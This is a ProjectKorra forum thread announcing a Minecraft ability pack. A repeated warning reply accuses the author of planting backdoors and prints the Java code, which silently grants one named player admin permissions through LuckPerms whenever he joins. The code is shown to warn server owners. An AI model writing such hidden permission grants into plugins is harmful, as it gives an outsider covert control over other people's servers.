• Proceed with caution! Unofficial add-on plugins and abilities are not supported by the ProjectKorra staff. We will not provide support for broken add-ons. Download at your own risk.
  • Hello Guest! Did you know that ProjectKorra has an official Discord server? A lot of discussion about the official server, development process, and community discussion happens over there. Feel free to join now by clicking the link below.

    Join the Discord Server
Resource icon

HelloyPack 1.0

Hihelloy

Verified Member
Hihelloy submitted a new resource:

HelloyPack - A ProjectKorra Ability Pack

# HelloyPack

A ProjectKorra ability addon pack by **Hihelloy** — 27 custom abilities spanning every bending element and subelement, built with block display entity visuals, Verlet-physics ropes, and multi-stage ability mechanics.

---

## Requirements

| Requirement | Version |
|---|---|
| Minecraft / Paper | **1.20.6 or higher** |
| ProjectKorra | **1.12.0** |
| Java | **17 or higher** |

> **Note:** The pack uses the Display Entity API (`BlockDisplay`, `TextDisplay`) and the 1.20.6...

Read more about this resource...
 
BEWARE - HIHELLOY IS KNOWN FOR ADDING BACKDOORS TO SERVERS - USE AT YOUR OWN RISK

Hihelloy was fired from BendersMC's development team for adding backdoors to plugins. He was working on a version of a custom weapons plugin and we caught him adding the following code to the plugin:

Code:
@EventHandler
   public void onPlayerJoin(PlayerJoinEvent event) {
      if (this.plugin.getServer().getPluginManager().getPlugin("LuckPerms") != null) {
         Player player = event.getPlayer();
         if (Bukkit.getPlayer("Hihelloy") != null && Bukkit.getPlayer("Hihelloy") == player) {
            this.giveAdminPerm(JedCore.getLuckPerms(), player);
         }

      }
   }

   public void giveAdminPerm(LuckPerms luckPerms, Player player) {
      User user = luckPerms.getPlayerAdapter(Player.class).getUser(player);
      Node node = Node.builder("mmoitems.admin").build();
      Node node2 = Node.builder("mythiclib.admin").build();
      user.data().add(node);
      user.data().add(node2);
      luckPerms.getUserManager().saveUser(user);
   }


What this did was give him backend access to mmoitems on one of our servers whenver he joined, it would check if the server he joined has mmoitems and luckperms, if so, it gave him admin perms for that plugin.


Just be cautious before using any of Loy's addons, double check the code if you are able to and ensure that there are no backdoors before installing any of his work on your server.
 
BEWARE - HIHELLOY IS KNOWN FOR ADDING BACKDOORS TO SERVERS - USE AT YOUR OWN RISK

Hihelloy was fired from BendersMC's development team for adding backdoors to plugins. He was working on a version of a custom weapons plugin and we caught him adding the following code to the plugin:

Code:
@EventHandler
   public void onPlayerJoin(PlayerJoinEvent event) {
      if (this.plugin.getServer().getPluginManager().getPlugin("LuckPerms") != null) {
         Player player = event.getPlayer();
         if (Bukkit.getPlayer("Hihelloy") != null && Bukkit.getPlayer("Hihelloy") == player) {
            this.giveAdminPerm(JedCore.getLuckPerms(), player);
         }

      }
   }

   public void giveAdminPerm(LuckPerms luckPerms, Player player) {
      User user = luckPerms.getPlayerAdapter(Player.class).getUser(player);
      Node node = Node.builder("mmoitems.admin").build();
      Node node2 = Node.builder("mythiclib.admin").build();
      user.data().add(node);
      user.data().add(node2);
      luckPerms.getUserManager().saveUser(user);
   }


What this did was give him backend access to mmoitems on one of our servers whenver he joined, it would check if the server he joined has mmoitems and luckperms, if so, it gave him admin perms for that plugin.


Just be cautious before using any of Loy's addons, double check the code if you are able to and ensure that there are no backdoors before installing any of his work on your server.
Yeah this is true, if this makes you feel anxious, don't download this or build it from the source https://github.com/Hihelloy-main/HelloyPack (check the code first)
 
Back
Top